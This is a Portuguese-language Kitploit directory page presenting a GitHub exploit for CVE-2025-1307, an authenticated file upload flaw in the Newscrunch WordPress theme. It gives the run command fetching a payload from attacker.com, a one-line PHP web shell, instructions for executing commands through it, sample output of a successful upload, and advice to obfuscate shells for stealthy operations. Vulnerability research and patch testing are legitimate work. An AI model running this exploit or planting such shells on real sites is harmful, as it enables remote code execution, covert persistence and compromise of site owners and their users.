Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-1307 — Newscrunch <= 1.8.4 - Upload Arbitrário de Arquivos Autenticado (Assinante+) | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-1307
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubnxploited/cve-2025-1307

CVE-2025-1307

Newscrunch <= 1.8.4 - Upload Arbitrário de Arquivos Autenticado (Assinante+)

Ver Repositório
21há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit Newscrunch (CVE-2025-1307)

🚨 Visão Geral

Este exploit visa uma vulnerabilidade crítica (CVE-2025-1307) no tema Newscrunch do WordPress. A falha permite que usuários autenticados (Assinante e acima) façam upload de arquivos arbitrários devido à falta de verificações de permissões na função newscrunch_install_and_activate_plugin(). Isso pode levar à Execução Remota de Código (RCE), comprometendo completamente o site WordPress afetado.


🔥 Detalhes da Vulnerabilidade

  • CVE ID: CVE-2025-1307
  • Software Afetado: Newscrunch WordPress Theme (<= 1.8.4.1)
  • Classificação CWE: CWE-862 - Autorização Ausente
  • Pontuação CVSS: 9.8 (Crítica)
  • Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Data de Publicação: 4 de março de 2025

🛑 Gravidade e Impacto

  • ✅ Execução Remota de Código (RCE)
  • ✅ Comprometimento Total do Sistema
  • ✅ Upload Não Autorizado de Arquivos
  • ✅ Risco de Escalação de Privilégios

Explorabilidade: Requer uma conta WordPress válida com privilégios de Assinante ou superiores.


📜 Recursos do Script

✅ Exploração Automatizada do CVE-2025-1307
✅ Detecção automática da versão vulnerável do tema
✅ Extração e execução automática do payload ZIP
✅ Obtém dinamicamente o nome do arquivo shell do ZIP
✅ Verifica automaticamente a disponibilidade do shell após a exploração
✅ Registro limpo e estruturado para depuração


🚀 Como Usar

📌 Pré-requisitos

Certifique-se de ter Python 3.x instalado e instale as dependências necessárias:

root@kitploit:~
pip install requests urllib3 packaging

🔧 Executando o Exploit

root@kitploit:~
python CVE-2025-1307.py -u "http://target" -un "admin" -p "password" -pl "http://attacker.com/malicious.zip"

🔹 Uso

root@kitploit:~
Exploit for CVE-2025-1307 in WordPress Newscrunch Theme By Nxploit | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., https://example.com)
  -un USERNAME, --username USERNAME
                        WordPress username
  -p PASSWORD, --password PASSWORD
                        WordPress password
  -pl PAYLOAD_URL, --payload_url PAYLOAD_URL
                        Malicious file URL to upload

🛠️ Usando o Shell Carregado

Uma vez que o shell seja carregado com sucesso, ele permite a execução remota de comandos no sistema alvo. O arquivo shell deve ser colocado dentro de um arquivo ZIP e será extraído automaticamente durante a exploração.

🔹 Criando o Payload ZIP

Certifique-se de que seu shell PHP (shell.php) esteja dentro de um arquivo ZIP. Em seguida, faça upload do arquivo ZIP usando o exploit.

root@kitploit:~
<?php system($_GET['cmd']); ?>

🔹 Executando Comandos

Você pode executar comandos do sistema via navegador, anexando o parâmetro cmd à URL do shell:

root@kitploit:~
http://target/wp-content/plugins/shell.php?cmd=whoami

⚠️ Protegendo o Shell

  • Por ser um shell web simples, ele não possui autenticação e deve ser usado com cautela.
  • Se detectado, pode ser facilmente removido pelos administradores.
  • Considere usar código PHP ofuscado ou shells protegidos por senha para operações furtivas.

🔹 Saída Esperada

root@kitploit:~
[+] Newscrunch theme version detected: 1.8.4
[+] Exploitation is possible, proceeding...
[*] Logging in...
[+] Logged in successfully.
[*] Uploading and extracting payload...
[+] Exploit executed successfully. Malicious file uploaded.
[*] Checking if shell is accessible: http://target/wp-content/plugins/U.php
[+] Shell successfully uploaded and accessible: http://target/wp-content/plugins/U.php?cmd=ls

⚠️ Aviso Legal

Esta ferramenta é apenas para fins educacionais e de pesquisa em segurança. A exploração não autorizada de vulnerabilidades é ilegal e punível por lei. O autor não se responsabiliza por qualquer uso indevido ou danos causados por esta ferramenta. Use com responsabilidade.

Por: Nxploit | Khaled Alenazi

Baixar ferramenta